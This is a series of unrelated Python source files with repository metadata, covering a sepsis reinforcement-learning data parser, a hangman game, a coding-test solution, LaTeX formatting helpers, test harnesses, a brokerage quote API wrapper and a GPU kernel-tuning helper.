import shuffle\nfrom tqdm import tqdm\nfrom sklearn.preprocessing import StandardScaler\n\n\nbinary_columns = ['gender',\n 're_admission',\n 'rrt',\n 'mechvent',\n 'sedation'\n ]\nbinary_actions_columns = [\n 'rrt',\n 'mechvent',\n 'sedation'\n]\nbinary_features_columns = [\n 'gender',\n 're_admission'\n]\nnumerical_columns_to_be_logged = ['age',\n 'Weight_kg',\n 'SpO2',\n 'SGOT',\n 'SGPT',\n 'Total_bili',\n 'WBC_count',\n 'Platelets_count',\n 'PTT',\n 'PT',\n 'INR',\n 'paO2',\n 'paCO2',\n 'Arterial_lactate',\n 'PaO2_FiO2',\n # 'input_total_tev',\n 'output_total'\n ] # 'cumulated_balance_tev']\nnumerical_columns_not_to_be_logged = ['SIRS',\n 'elixhauser',\n 'SOFA',\n 'FiO2_1',\n 'GCS',\n 'HR',\n 'SysBP',\n 'Arterial_BE',\n 'MeanBP',\n 'DiaBP',\n 'Shock_Index',\n 'RR',\n 'SpO2',\n 'Temp_C',\n 'Potassium',\n 'Sodium',\n 'Chloride',\n 'Glucose',\n 'BUN',\n 'Creatinine',\n 'Magnesium',\n 'Calcium',\n 'Ionised_Ca',\n 'CO2_mEqL',\n 'Albumin',\n 'Hb',\n 'Arterial_pH',\n 'Arterial_BE',\n 'HCO3']\naction_cols = ['max_dose_vaso', 'input_4hourly_tev']\nlog_action_cols = ['log_vaso', 'log_fluid']\n\n\ndef split_train_test_idx(data, train_prop=.95):\n ids = shuffle(data.icustayid.unique())\n return ids[:int(train_prop * ids.shape[0])], ids[int(train_prop * ids.shape[0]):]\n\n\ndef compute_action_quantiles(data):\n quantiles_fluid = {q: np.percentile(data.input_4hourly_tev.loc[data.input_4hourly_tev > 0].apply(np.log), q) for q\n in [25, 50, 75]}\n quantiles_vaso = {q: np.percentile(data.max_dose_vaso.loc[data.max_dose_vaso > 0].apply(np.log), q) for q in\n [25, 50, 75]}\n return quantiles_fluid, quantiles_vaso\n\n\ndef quantized_actions(fluid, vaso, quantiles_fluid, quantiles_vaso):\n \"\"\"Divide the possible actions in 25 categories\"\"\"\n if fluid == 0:\n i = 0\n else:\n if np.log(fluid) <= quantiles_fluid[25]:\n i = 1\n if quantiles_fluid[25] < np.log(fluid) <= quantiles_fluid[50]:\n i = 2\n if 
quantiles_fluid[50] < np.log(fluid) <= quantiles_fluid[75]:\n i = 3\n if quantiles_fluid[75] < np.log(fluid):\n i = 4\n if vaso == 0:\n j = 0\n else:\n if np.log(vaso) <= quantiles_vaso[25]:\n j = 1\n if quantiles_vaso[25] < np.log(vaso) <= quantiles_vaso[50]:\n j = 2\n if quantiles_vaso[50] < np.log(vaso) <= quantiles_vaso[75]:\n j = 3\n if quantiles_vaso[75] < np.log(vaso):\n j = 4\n return i + 5 * j\n\n\ndef create_action_column(data):\n quantiles_fluid, quantiles_vaso = compute_action_quantiles(data)\n actions = []\n for t in data[['input_4hourly_tev', 'max_dose_vaso']].itertuples():\n fluid = t.input_4hourly_tev\n vaso = t.max_dose_vaso\n actions.append(quantized_actions(fluid, vaso, quantiles_fluid, quantiles_vaso))\n\n data['action'] = pd.Series(actions, index=data.index)\n data.action = data.action.apply(int)\n\n\ndef add_small_quantities(data):\n # adding small quantities to each zeros logged value. These values were chosen to be 50-100 times smaller than the lowest nonzero value\n data.Total_bili += 1e-4\n data.SGOT += 1e-2\n data.SGPT += 1e-2\n data.input_total_tev += 1e-3\n data.output_total += 1e-2\n data.PaO2_FiO2 += 1e-1\n data.Arterial_lactate += 1e-3\n data.PTT += 1e-1\n data.INR += 1e-3\n data.paCO2 += 1e-1\n data.paO2 += 1e-1\n\n\ndef add_relative_time_column(data):\n # add a column containing the time in hours since arrival\n relative_times = []\n patients = set()\n for t in data[['icustayid', 'charttime']].itertuples():\n time = t.charttime\n patient = t.icustayid\n if patient not in patients:\n start_time = time\n patients.add(patient)\n relative_times.append((time - start_time) / 3600)\n data['relative_time'] = pd.Series(relative_times, index=data.index)\n return data\n\n\ndef drop_patients_with_unrealistic_HR_or_BP(data):\n patients_to_drop = data[(data.HR == 8) | (data.DiaBP < 0)].icustayid.unique()\n data = data.loc[~data.icustayid.isin(patients_to_drop)]\n return data\n\n\ndef replace_absurd_temperatures(data):\n data.loc[data.Temp_C < 33, 'Temp_C'] = 37\n\n\ndef drop_patients_with_absurd_weights(data):\n return data.loc[~data.icustayid.isin(data.loc[data.Weight_kg < 20].icustayid.unique())]\n\n\ndef drop_patient_with_negative_input(data):\n return data.loc[~data.icustayid.isin(data.loc[data.input_total_tev < 0].icustayid.unique())]\n\n\ndef add_log_actions(data):\n eps_vaso = data.loc[data.max_dose_vaso>0][['max_dose_vaso']].values.min()\n eps_fluid = data.loc[data.input_4hourly_tev>0][['input_4hourly_tev']].values.min()\n data['log_vaso'] = data.max_dose_vaso.apply(lambda x: np.log(x*(x>0) + (x==0)*eps_vaso))\n data['log_fluid'] = data.input_4hourly_tev.apply(lambda x: np.log(x*(x>0) + (x==0)*eps_fluid))\n\n\ndef matrify_histories(data, idx, scaler, log_scaler, action_scaler, T=25, verbose=True, log_action=True):\n \"\"\"\n Transform the Pandas dataset into numpy arrays that can be used to train a neural network\n :param data: a dataframe containing the sepsis dataset\n :param idx: the values of `icustayid` we want to filter on (typically to extract a train and a test set)\n :param scaler: the sklearn.preprocessing.StandardScaler that scales the numerical values\n :param log_scaler: the sklearn.preprocessing.StandardScaler that scales the numerical logged values\n :param verbose: whether to print stuff or not\n :return: several 3d arrays, with the first dimension (the number of patients selected by idx)\n - X_bin: the values of the binary columns, X_num, X_action, X_finished, X_alive\n - X_num: the numerical values\n - X_action: the action that were taken\n - 
X_finished : an array containing a 1 at the final timestep\n - X_alive: an array that is 1 while the patient is alive and gets 0 at the end\n \"\"\"\n n_cols = len(binary_columns) + len(numerical_columns_not_to_be_logged) + len(numerical_columns_to_be_logged)\n n = idx.shape[0]\n\n X_action_bin = np.zeros((n, T, len(binary_actions_columns))) # rrt, sedation, mechvent\n X_features_bin = np.zeros((n, len(binary_features_columns))) # gender, re_admission\n X_num = np.zeros((n, T, n_cols - len(binary_columns)))\n X_action = np.zeros((n, T, 2))\n X_finished = np.zeros((n, T, ))\n X_alive = np.zeros((n, T, ))\n\n if verbose:\n iterator = tqdm(enumerate(data.loc[data.icustayid.isin(idx)].groupby('icustayid')))\n else:\n iterator = enumerate(data.loc[data.icustayid.isin(idx)].groupby('icustayid'))\n for k, (idx, df) in iterator:\n x_action_bin = df[binary_actions_columns].values\n x_features_bin = df[binary_features_columns].values[0]\n x_num_not_logged = scaler.transform(df[numerical_columns_not_to_be_logged])\n x_num_logged = log_scaler.transform(np.log(df[numerical_columns_to_be_logged]))\n x_num = np.concatenate([x_num_not_logged, x_num_logged], -1)\n if log_action:\n actions = action_scaler.transform(df[log_action_cols].values)\n else:\n actions = action_scaler.transform(df[action_cols].values)\n finished = np.zeros((T, ))\n finished[len(df) - 1:] = 1\n alive = np.ones((T, ))\n if df[['mortality_90d']].iloc[0].values[0] == 1:\n # alive[T-1:] = 0\n if df[['died_in_hosp']].iloc[0].values[0] == 1:\n alive[len(df) - 1:] = 0\n else:\n alive[len(df):] = 0\n\n # pad with zeros\n x_action_bin = np.concatenate([x_action_bin, np.zeros((T - len(df), len(binary_actions_columns)))], 0)\n x_num = np.concatenate([x_num, np.zeros((T - len(df), n_cols - len(binary_columns)))], 0)\n actions = np.concatenate([actions, np.zeros((T - len(df), 2))], 0)\n\n # k-th history\n X_action_bin[k] = x_action_bin\n X_features_bin[k] = x_features_bin\n X_num[k] = x_num\n X_action[k] = actions\n X_finished[k] = finished\n X_alive[k] = alive\n\n return \n\n\ndef transition_iterator(data, idx=None, scaler=StandardScaler(), log_scaler=StandardScaler(), action_scaler=StandardScaler(), RMAX=15, log_action=True):\n \"\"\"\n Put the dataset in form of a list of transition (s,a,r,s')\n :param data: the pandas dataframe containing the sepsis dataset\n :param idx: the icustayids of the patients you want to consider (for example for split into train and test set). If None, returns the entire dataset\n :param scaler: (sklearn.preprocessing.StandardScaler)\n the scaler of the numerical features that are not logged. It should be already fitted\n :param log_scaler: (sklearn.preprocessing.StandardScaler)\n the scaler of the logged numerical features. It should already be fitted\n :param action_scaler: (sklearn.preprocessing.StandardScaler)\n the scaler of the actions. 
It should already be fitted\n :param RMAX: the max reward\n :param log_action: whether to extract take the logged or the normal actions\n :return:\n \"\"\"\n TRANSITIONS = []\n \n if idx is None:\n iterator = enumerate(data.groupby('icustayid'))\n else: \n iterator = enumerate(data.loc[data.icustayid.isin(idx)].groupby('icustayid'))\n for k, (idx, df) in iterator:\n # create the state: concatenation of numerical values (logged or not logged), the binary actions, and the binary features (gender, re_admission)\n state_action_bin = df[binary_actions_columns].values\n state_features_bin = df[binary_features_columns].values\n state_num_not_logged = scaler.transform(df[numerical_columns_not_to_be_logged])\n state_num_logged = log_scaler.transform(np.log(df[numerical_columns_to_be_logged]))\n state = np.concatenate([state_num_not_logged, state_num_logged, state_action_bin, state_features_bin], -1)\n\n # actions\n if log_action:\n actions = action_scaler.transform(df[log_action_cols].values)\n else:\n actions = action_scaler.transform(df[action_cols].values)\n\n # rewards: 0 always, and final +-RMAX depending on the\n rewards = np.zeros((len(df), ))\n# if df[['mortality_90d']].iloc[0].values[0] == 1:\n# if df[['died_in_hosp']].iloc[0].values[0] == 1:\n# rewards[-1] = -RMAX\n# else:\n# rewards[-1] = RMAX\n\n if df[['mortality_90d']].iloc[0].values[0] == 1:\n rewards[-1] = -RMAX\n else:\n rewards[-1] = RMAX \n\n # add transitions to the list\n for k in range(len(df) - 1):\n TRANSITIONS.append((state[k], actions[k], rewards[k], state[k+1]))\n TRANSITIONS.append((state[-1], actions[-1], rewards[-1], None))\n\n return TRANSITIONS\n","repo_name":"cfosco/reinforcement_learning_sepsis","sub_path":"parse_dataset.py","file_name":"parse_dataset.py","file_ext":"py","file_size_in_byte":12805,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"73423463840","text":"#Step 4\n\nimport random\n\nstages = ['''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========\n''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========\n''', '''\n +---+\n | |\n |\n |\n |\n |\n=========\n''']\n\nend_of_game = False\nword_list = [\"aardvark\", \"baboon\", \"camel\", \"Hello\", \"World\", \"This\", \"Beautiful\", \"Anjikaran\", \"Manan\", \"Noname\", \"anonymous\", \"blackhat\", \"ardvark\"]\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\n\nlives = 6\n\n#Create blanks\ndisplay = []\nfor _ in range(word_length):\n display += \"_\"\nprint(f\"This is {word_length} letter word.\")\nwhile not end_of_game:\n guess = input(\"Guess a letter: \").lower()\n\n #Check guessed letter\n for position in range(word_length):\n letter = chosen_word[position]\n\n if letter.lower() == guess.lower():\n display[position] = letter\n print(stages[lives])\n\n if guess.lower() not in chosen_word:\n if lives > 0:\n lives = lives - 1\n print(stages[lives])\n else:\n end_of_game=True\n print(\"You Lose\")\n print(stages[lives])\n \n #Join all the elements in the list and turn it into a String.\n print(f\"{' '.join(display)}\")\n\n #Check if user has got all letters.\n if \"_\" not in display:\n end_of_game = True\n print(\"You win.\")\n 
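#Show the final state of the gallows after the win as well\n        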
print(stages[lives])","repo_name":"cryptic-hunter/Learning-Python","sub_path":"day-007/code4.py","file_name":"code4.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25377224614","text":"from collections import defaultdict\n\ndef solution(id_list, report, k):\n    answer = []\n    report = list(set(report))\n    dic = defaultdict(list) # with dic[re[0]] = re[1], only the last report would be kept when muzi reports twice.\n    cnt = defaultdict(int) # the default must be int so never-reported users still come out as apeach : 0 and no error occurs.\n\n    for r in report:\n        re = r.split()\n        dic[re[0]].append(re[1])\n        cnt[re[1]] += 1\n    \n    for i in id_list:\n        res = 0\n        for u in dic[i]: # muzi must receive a mail for each of the two users muzi reported\n            if cnt[u] >= k:\n                res += 1\n        answer.append(res)\n    \n    return answer\n\nid_list = [\"muzi\", \"frodo\", \"apeach\", \"neo\"]\nreport = [\"muzi frodo\",\"apeach frodo\",\"frodo neo\",\"muzi neo\",\"apeach muzi\"]\nk = 2\nprint(solution(id_list, report, k))\n\n\"\"\"\nIf there were no defaultdict:\n\ndic = {} \nif re[0] not in dic: --> it would look like this, but doing it that way gives results like the line below.\n    dic[re[0]] += re[1] {'muzi': 'frodoneo', 'apeach': 'frodomuzi', 'frodo': 'neo'}\nelse:\n    dic[re[0]] = re[1]\n\"\"\"","repo_name":"noxknow/Python-Coding_test","sub_path":"(05) 2022 카카오 블라인드, 인턴쉽/2022 카카오 블라인드 신고 결과 받기.py","file_name":"2022 카카오 블라인드 신고 결과 받기.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"9466829562","text":"from __future__ import division\n\nimport os\n\nfrom astropy import units\nfrom astropy.units.format import (latex as ulatex, utils as uutils)\n\n__author__ = \"Duncan M. Macleod \"\n\nUSE_TEX = os.system('which pdflatex > %s 2>&1' % os.devnull) == 0\n\nLATEX_CONTROL_CHARS = [\"%\", \"\\\\\", \"_\", \"~\", \"&\"]\n\nMACROS = [\n    r'\\def\\rtHz{\\ensuremath{\\sqrt{\\mathrm{Hz}}}}', # \\sqrt{Hz} label\n]\n\n\ndef float_to_latex(x, format=\"%.2g\"):\n    \"\"\"Convert a floating point number to a latex representation.\n    In particular, scientific notation is handled gracefully: e -> 10^\n    Example:\n    @code\n    >>> float_to_latex(2000)\n    '2\\times 10^{3}'\n    @endcode\n    @returns a string in latex mathmode\n    \"\"\"\n    base_str = format % x\n    if \"e\" not in base_str:\n        return base_str\n    mantissa, exponent = base_str.split(\"e\")\n    if float(mantissa).is_integer():\n        mantissa = int(float(mantissa))\n    exponent = exponent.lstrip(\"0+\")\n    if exponent.startswith('-0'):\n        exponent = '-' + exponent[2:]\n    if float(mantissa) == 1.0:\n        return r\"10^{%s}\" % exponent\n    else:\n        return r\"%s\\!\\!\\times\\!\\!10^{%s}\" % (mantissa, exponent)\n\n\ndef label_to_latex(text):\n    \"\"\"Convert an arbitrary string of text into a latex-passable\n    representation.\n    \"\"\"\n    if text is None:\n        return ''\n    for ch in LATEX_CONTROL_CHARS:\n        text = text.replace(ch, \"\\\\%s\" % ch)\n    return text\n\n\ndef unit_to_latex(unit):\n    if isinstance(unit, units.NamedUnit):\n        s = label_to_latex(unit.name)\n    elif isinstance(unit, units.CompositeUnit):\n        if unit.scale != 1:\n            s = float_to_latex(unit.scale) + r'\\ '\n        else:\n            s = ''\n        if len(unit.bases):\n            positives, negatives = uutils.get_grouped_by_powers(\n                unit.bases, unit.powers)\n            if len(negatives) == 1:\n                negatives = format_unit_list(negatives)\n                positives = positives and format_unit_list(positives) or 1\n                s += r'{0}/{1}'.format(positives, negatives)\n            elif len(negatives):\n                if len(positives):\n                    positives = format_unit_list(positives)\n                else:\n                    positives = ''\n                negatives = 
format_unit_list(negatives, negative=True)\n s += r'{0}\\,{1}'.format(positives, negatives)\n else:\n positives = format_unit_list(positives)\n s += positives\n return r'$\\mathrm{{{0}}}$'.format(s)\n\n\ndef format_unit_list(unitlist, negative=False):\n out = []\n texformatter = ulatex.Latex()\n for base, power in unitlist:\n if power == 1 and not negative:\n out.append(texformatter._get_unit_name(base))\n elif power == 0.5 and not negative:\n out.append('\\sqrt{{{0}}}'.format(label_to_latex(base.name)))\n elif power != 1 and 1/power == int(1/power):\n out.append('{0}^{{1/{1}}}'.format(\n label_to_latex(base.name), int(1/power)))\n elif negative:\n out.append('{0}^{{-{1}}}'.format(\n label_to_latex(base.name), power))\n else:\n out.append('{0}^{{{1}}}'.format(\n label_to_latex(base.name), power))\n return r'\\,'.join(out)\n","repo_name":"pmeyers279/basketball_db","sub_path":"basketball_db/plotter/tex.py","file_name":"tex.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41218155854","text":"from parsley.test import *\nfrom wooly import *\n\nfrom user import *\nfrom util import *\n\nlog = logging.getLogger(\"cumin.test\")\n\nclass CuminTest(Test):\n def __init__(self, app):\n super(CuminTest, self).__init__(\"cumin\", None)\n\n self.app = app\n self.user = None\n\n def init(self):\n for module in self.app.modules:\n module.init_test(self)\n\n super(CuminTest, self).init()\n\n def do_run(self, session):\n log.info(\"Waiting for the broker to connect\")\n\n def connect():\n if self.app.model.mint.model.agents:\n log.info(\"The broker is connected\")\n return True\n\n connected = retry(connect)\n\n if not connected:\n raise Exception(\"Failed to connect to broker\")\n\n self.user = Subject.getByName(\"tester\")\n\n if not self.user:\n self.user = Subject(name=\"tester\", password=\"XXX\")\n self.user.syncUpdate()\n\n super(CuminTest, self).do_run(session)\n\nclass TaskFormTest(Test):\n def __init__(self, name, parent, task):\n super(TaskFormTest, self).__init__(name, parent)\n\n self.task = task\n\n def enter(self, session, s):\n return self.task.enter(s, None)\n\n def add_input(self, session, s):\n pass\n\n def check(self, session, s):\n pass\n\n def do_run(self, session):\n s = MainPageSession(self.harness)\n\n s = self.enter(session, s)\n\n check_render(s)\n\n self.add_input(session, s)\n\n check_submit_form(s, self.task.form)\n\n self.check(session, s)\n\n super(TaskFormTest, self).do_run(session)\n \nclass MainPageSession(Session):\n def __init__(self, harness):\n super(MainPageSession, self).__init__(harness.test.app.main_page)\n\n usess = UserSession(harness.test.app, harness.test.user)\n self.user_session = usess\n\ndef retry(fn):\n result = None\n\n for i in range(10):\n result = fn()\n\n if result:\n break\n\n sleep(1)\n\n return result\n\ndef check_render(session):\n session.page.process(session)\n session.page.render(session)\n\ndef check_submit_form(session, form):\n form.submit(session)\n\n session.page.process(session)\n\n redirect = session.page.redirect.get(session)\n\n if redirect is None:\n errors = task.form.errors.get(ns)\n\n if errors:\n raise Exception(\"Unexpected form input errors\")\n\n nsession = Session.unmarshal(session.page.app, redirect)\n\n check_render(nsession)\n\ndef check_get_object(cls, **criteria):\n def get():\n for obj in cls.selectBy(**criteria):\n return obj\n\n obj = retry(get)\n\n if not obj:\n args = (cls.__name__, criteria)\n raise 
Exception(\"Object %s(%s) not found\" % args)\n\n return obj\n\ndef check_removed(cls, **criteria):\n def find():\n for obj in cls.selectBy(**criteria):\n return\n\n return True\n\n removed = retry(find)\n\n if not removed:\n args = (cls.__name__, criteria)\n raise Exception(\"Object %s(%s) not removed\" % args)\n","repo_name":"ssorj/boneyard","sub_path":"spicerack/cumin/python/cumin/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"74539416801","text":"# -*- coding: utf-8 -*-\n#REF: https://easontseng.blogspot.com/2017/\n\nimport pythoncom, time, os,threading\nimport comtypes.client as cc\nfrom datetime import datetime\nimport matplotlib.pyplot as plt\nfrom logging import handlers\n\nclass CAP_Quoter(threading.Thread):\n\t#建立事件類別\n\tclass skQ_events:\n\t\tdef __init__(self, parent):\n\t\t\tself.MSG=parent.MSG\n\t\t\tself.parent=parent\n\t\tdef OnConnection(self, nKind, nCode):\n\t\t\tself.parent.log.critical('[e]OnConnection:', self.MSG(nKind),nKind, self.MSG(nCode))\t\n\t\t\tif nKind==3003: self.parent.step2()\n\t\t\t\t\n\t\tdef OnNotifyServerTime(self,sHour,sMinute,sSecond,nTotal):\n\t\t\tself.parent.watchdog=0 #log.info(sHour,\":\",sMinute,\":\",sSecond,\"--\",nTotal)\n\t\tdef OnNotifyQuote(self, sMarketNo, sStockidx):\n\t\t\tself.parent.log.info(sMarketNo,sStockidx)\n\t\tdef OnNotifyHistoryTicks(self, sMarketNo, sStockIdx, nPtr, lDate, lTimehms, lTimemillismicros, nBid, nAsk, nClose, nQty, nSimulate):\n\t\t\tself.parent.log.info(sMarketNo, sStockIdx, nPtr, lTimehms, nClose, nQty)\n\t\tdef OnNotifyTicks(self,sMarketNo, sStockIdx, nPtr, lDate, lTimehms, lTimemillismicros, nBid, nAsk, nClose, nQty, nSimulate):\n\t\t\tself.parent.log.info(sMarketNo, sStockIdx, nPtr, lDate, lTimehms, lTimemillismicros, nBid, nAsk, nClose, nQty, nSimulate)\n\t\tdef OnNotifyKLineData(self,bstrStockNo,bstrData):\n\t\t\tself.parent.log.info(bstrStockNo,bstrData)\n\t\tdef OnNotifyFutureTradeInfo(self,bstrStockNo,sMarketNo,sStockidx,nBuyTotalCount,nSellTotalCount,nBuyTotalQty\t,nSellTotalQty,nBuyDealTotalCount,nSellDealTotalCount):\n\t\t\tself.parent.log.info(sMarketNo,sStockidx,nBuyTotalCount,nSellTotalCount,nBuyTotalQty,nSellTotalQty,nBuyDealTotalCount,nSellDealTotalCount,bstrStockNo)\n\t\tdef OnNotifyStockList(self,sMarketNo,bstrStockData):\n\t\t\tif self.parent.FilterStockList(sMarketNo,bstrStockData):\tself.parent.step3()\n\t\t\n\tdef __init__(self,tid,tpw,log):\n\t\tthreading.Thread.__init__(self)\n\t\tcc.GetModule(os.path.split(os.path.realpath(__file__))[0] + r'\\SKCOM.dll')\n\t\tfrom comtypes.gen import SKCOMLib as sk\n\t\tself.skC=cc.CreateObject(sk.SKCenterLib,interface=sk.ISKCenterLib)\n\t\tself.skQ=cc.CreateObject(sk.SKQuoteLib,interface=sk.ISKQuoteLib)\n\t\tself.EventQ=self.skQ_events(self)\n\t\tself.ConnectionQ = cc.GetEvents(self.skQ, self.EventQ)\n\t\tself.feature_list=[]\n\t\tself.option_list=[]\n\t\tself.feature_code=\"\"\n\t\tself.option_code=\"\"\n\t\tself.watchdog=0\n\t\tself.id=tid\n\t\tself.pw=tpw\n\t\tself.log=log\n\t\t\n\tdef join(self):\n\t\tself.log.critical(\"[9]LeaveMonitor:\", self.MSG(self.skQ.SKQuoteLib_LeaveMonitor()))\t\n\t\tthreading.Thread.join(self)\n\n\t\t\t\n\tdef MSG(self,code):\n\t\treturn self.skC.SKCenterLib_GetReturnCodeMessage(code)\n\t\n\tdef step1(self):\n\t\tself.log.critical(\"[1]Login:\", self.MSG(self.skC.SKCenterLib_Login(self.id,self.pw)))\n\t\tself.log.critical(\"[2]EnterMonitor:\", 
self.MSG(self.skQ.SKQuoteLib_EnterMonitor()))\t\n\t\t\n\tdef step2(self):\n\t\tself.log.critical(\"[3]RequestFutureList:\", self.MSG(self.skQ.SKQuoteLib_RequestStockList(2)))\n\t\tself.log.critical(\"[4]RequestOptionList:\", self.MSG(self.skQ.SKQuoteLib_RequestStockList(3)))\n\t\t\n\tdef step3(self):\n\t\timport ctypes\n\t\tself.log.critical(self.option_code)\n\t\tself.log.critical(self.feature_code)\n#\t\tfor fc in self.feature_code.split(\",\"):\n#\t\t\tr=self.skQ.SKQuoteLib_RequestTicks(-1, fc)\n#\t\t\tself.log.critical(\"[5]RequestLiveTick:\",fc, self.MSG(r[1]),r[0])\n#\t\t\tself.log.critical(\"[6]RequestFutureTradeInfo:\",fc, self.MSG(self.skQ.SKQuoteLib_RequestFutureTradeInfo(ctypes.c_short(r[0]), fc)))\n\t\t\t\n\tdef FilterStockList(self,sMarketNo,bstrStockData):\n\t\ttmp_dict=bstrStockData.split(';')\n\t\tmarket_dict=[]\n\t\tmarket_code=[]\n\t\tfor m in tmp_dict:\n\t\t\tif ('TX' in m) and not('/' in m): \n\t\t\t\tc=m.split(',')[0]\n\t\t\t\tmarket_dict.append(m)\n\t\t\t\tmarket_code.append(c)\n\t\tif len(market_dict)<10: return False #避免出現 ['TXO06', 'TXO07', 'TXO08', 'TXO09', 'TXO12', 'TX106']\n\t\tif sMarketNo==2: \n\t\t\tself.feature_list=market_dict\n\t\t\tself.feature_code=\",\".join(market_code)\n\t\tif sMarketNo==3: \n\t\t\tself.option_list=market_dict\n\t\t\tself.option_code=\",\".join(market_code)\n\n\t\treturn len(self.feature_list)>0 and len(self.option_list)>0\n\t\n\tdef check_alive(self,period=10000):\n\t\tself.watchdog+=1\n\t\treturn self.watchdog len(self.points) - 1:\n return index % len(self.points)\n return index\n\n\nxy = random_trajectory()\n\narr = np.array(xy).T\n\nline = geom.LineString(arr)\n\nfig, ax = plt.subplots()\nax.plot(arr[:, 0][0:], arr[:, 1][0:])\nax.scatter(arr[:, 0][0:], arr[:, 1][0:], s=2.1)\n\nax.axis('equal')\nNearestPoint(line, ax, arr)\n\nplt.show()\n","repo_name":"nor-code/rl_sphere_robot","sub_path":"test/check_distance.py","file_name":"check_distance.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23720843659","text":"import os.path\nimport pytest\nfrom guidescanpy.flask import create_app\nfrom guidescanpy import config\n\n\n@pytest.fixture(scope=\"session\")\ndef app():\n return create_app(debug=True)\n\n\n@pytest.fixture(scope=\"session\")\ndef bam_file():\n return os.path.join(os.path.dirname(__file__), \"data\", \"sacCer3.bam.sorted\")\n\n\n@pytest.fixture(scope=\"session\")\ndef sacCer3_chromosome_names():\n return {\n \"NC_001133.9\": \"chrI\",\n \"NC_001134.8\": \"chrII\",\n \"NC_001135.5\": \"chrIII\",\n \"NC_001136.10\": \"chrIV\",\n \"NC_001137.3\": \"chrV\",\n \"NC_001138.5\": \"chrVI\",\n \"NC_001139.9\": \"chrVII\",\n \"NC_001140.6\": \"chrVIII\",\n \"NC_001141.2\": \"chrIX\",\n \"NC_001142.9\": \"chrX\",\n \"NC_001143.9\": \"chrXI\",\n \"NC_001144.5\": \"chrXII\",\n \"NC_001145.3\": \"chrXIII\",\n \"NC_001146.8\": \"chrXIV\",\n \"NC_001147.6\": \"chrXV\",\n \"NC_001148.4\": \"chrXVI\",\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef sacCer3_region_CNE1():\n return {\n \"entrez_id\": 851241,\n \"region_name\": \"CNE1\",\n \"start_pos\": 37464,\n \"end_pos\": 38972,\n \"sense\": True,\n \"chromosome_name\": \"chrI\",\n \"chromosome_accession\": \"NC_001133.9\",\n }\n\n\n@pytest.fixture(scope=\"session\")\ndef index_prefix():\n index_dir = config.guidescan.index_files_path_prefix\n index_prefix = config.guidescan.index_files_path_map.sacCer3\n index_prefix = os.path.join(index_dir, index_prefix)\n return 
index_prefix\n\n\n@pytest.fixture(scope=\"session\")\ndef data_folder():\n return os.path.join(os.path.dirname(__file__), \"data\")\n","repo_name":"pritykinlab/guidescanpy","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16470793446","text":"import argparse\nimport numpy as np\nimport os\nimport pynvml\nimport re\n\nimport kernel_tuner\nfrom kernel_tuner.nvml import NVMLObserver\n\n\ndef get_default_parser():\n parser = argparse.ArgumentParser(description='Tune kernel.')\n parser.add_argument(\"--file\", required=True, help=\"Path to kernel source file\")\n parser.add_argument(\"--store-json\", action=\"store_true\")\n parser.add_argument(\"--tune-power-limit\", action=\"store_true\")\n parser.add_argument(\"--power-limit-steps\", nargs=\"?\")\n parser.add_argument(\"--tune-gr-clock\", action=\"store_true\")\n parser.add_argument(\"--gr-clock-steps\", nargs=\"?\")\n parser.add_argument(\"--tune-mem-clock\", action=\"store_true\")\n parser.add_argument(\"--mem-clock-steps\", nargs=\"?\")\n return parser\n\n\ndef get_kernel_string(filename):\n # Helper function to recursively get a parent directory\n def get_parent_dir(dirname, level=1):\n if (level == 0):\n return dirname\n else:\n parentdir = os.path.abspath(os.path.join(dirname, os.pardir))\n return get_parent_dir(parentdir, level -1)\n\n # All the directories to look for kernel sources and header files\n prefixes = []\n dirname_kernel = os.path.dirname(filename) # e.g. idg-lib/src/CUDA/common/kernels\n prefixes.append(dirname_kernel)\n dirname_src = get_parent_dir(dirname_kernel, 3) # e.g. idg-lib/src\n prefixes.append(dirname_src)\n\n # Helper function to recursively get file contents with local includes\n def add_file(filename, level=1):\n result = [\"\"]\n for prefix in prefixes:\n try:\n with open(f\"{prefix}/{filename}\", \"r\") as f:\n lines = f.readlines()\n for line in lines:\n # Match lines where a local header file is included\n if line.startswith('#include \"'):\n # Extract the name of the header file\n m = re.findall(r'\"(.*?)\"', line)\n\n # If a valid filename was found, add it recursively\n if len(m):\n header_file = m[0]\n padding = \"*\" * level\n result += f\"/{padding} BEGIN INLINE {header_file} {padding}/\\n\"\n result += add_file(header_file, level + 1)\n result += \"\\n\"\n result += (\n f\"/{padding} END INLINE {header_file} {padding}/\\n\"\n )\n else:\n result += [line]\n break\n except FileNotFoundError:\n # It is ok if a file is not found, it might exists in another prefix\n pass\n return result\n\n # Start gathering all the source lines\n filename_kernel = os.path.basename(filename) # e.g. 
